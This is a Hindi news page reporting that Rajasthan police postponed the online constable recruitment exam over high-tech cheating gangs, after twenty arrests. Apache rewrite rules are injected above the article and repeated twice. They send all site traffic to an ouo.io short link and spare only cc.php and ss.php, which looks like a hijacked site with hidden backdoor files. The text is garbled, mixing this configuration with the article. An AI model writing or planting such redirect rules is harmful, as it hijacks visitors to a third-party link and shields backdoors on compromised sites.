
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 523
Previous Nextजयपुर। हाईटेक नकल गिरोहों की भेंट चढ़ी राजस्थान पुलिस कांस्टेबल ऑनलाइन भर्ती परीक्षा को पुलिस मुख्यालय ने स्थगित कर दिया है। पुलिस मुख्यालय की ओर से जारी आदेश में कांस्टेबल ऑनलाइन परीक्षा में हाईटेक नकल कराने वाले कई गिरोह की सक्रियता के कारण परीक्षा को आगामी आदेश तक स्थगित किया गया है। परीक्षाओं की स्थिति को लेकर पुलिस महानिदेशक ओ. पी. गल्होत्रा ने शनिवार को पुलिस मुख्यालय में एक बैठक ली। बैठक में अतिरिक्त महानिदेशक पुलिस मुख्यालय राजीव शर्मा, एडीजी एसओजी उमेश मिश्रा, आईजी संजीव नार्जरी सहित सभी एजेन्सियों के एडीजी शामिल हुए। पुलिस मुख्यालय ने आदेश जारी कर कहा है कि एसओजी द्वारा ऑनलाइन परीक्षा में हाईटेक नकल कराने वाले बीस लोगों की गिरफ्तारी के बाद परीक्षाओं की विश्वसनीयता पर सवाल उठ रहे हैं। इस संबंध में ऑनलाइन परीक्षा आयोजित कराने वाली एजेन्सी के पदाधिकारियों से भी चर्चा की गई। पुलिस मुख्यालय ने आगामी आदेश तक पुलिस कांस्टेबल भर्ती परीक्षा को स्थगित करने का आदेश जारी कर दिया है। उल्लेखनीय है कि परीक्षा के शुरू होते ही इसमें हाईटेक तरीके से नकल के मामले सामने आने लगे थे। उसके बाद में एसओजी ने मामले की जांच पड़ताल कर कार्रवाई करते हुए नकल गिरोह से जुड़ कई लोगों की धरपकड़ की थी।